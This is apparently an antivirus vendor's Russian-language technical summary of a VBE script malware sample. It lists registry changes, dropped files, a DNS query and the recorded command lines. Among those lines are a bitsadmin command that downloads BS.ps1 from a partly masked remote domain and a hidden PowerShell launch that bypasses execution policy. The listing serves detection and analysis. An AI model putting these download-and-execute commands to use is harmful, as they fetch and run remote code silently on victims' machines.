Техническая информация
- [<HKLM>\SOFTWARE\Classes\VBEFile\Shell\Open\Command] '' = '%WINDIR%\SysWow64\WScript.exe "%1" %*'
- %TEMP%\aut1faf.tmp
- %TEMP%\~baekfxo.vbe
- %WINDIR%\syswow64\<Имя файла>.vbe
- %WINDIR%\syswow64\<Имя файла>.vbe
- %TEMP%\aut1faf.tmp
- %WINDIR%\syswow64\<Имя файла>.vbe
- %TEMP%\~baekfxo.vbe
- DNS ASK im#.##bat-malek.com
- '%TEMP%\~baekfxo.vbe' "%WINDIR%\SysWOW64\<Имя файла>.vbe"
- '%TEMP%\~baekfxo.vbe' "%WINDIR%\SysWOW64\<Имя файла>.vbe"' (со скрытым окном)
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer myFile /download /priority normal http://im#.##bat-malek.com/uploads/files/BS.ps1 %TEMP%\BS.ps1' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -file %LOCALAPPDATA%\Temp/BS.PS1' (со скрытым окном)
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer myFile /download /priority normal http://im#.##bat-malek.com/uploads/files/BS.ps1 %TEMP%\BS.ps1
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -file %LOCALAPPDATA%\Temp/BS.PS1
- '%WINDIR%\syswow64\wscript.exe' //B "%TEMP%\<Имя файла>.vbe"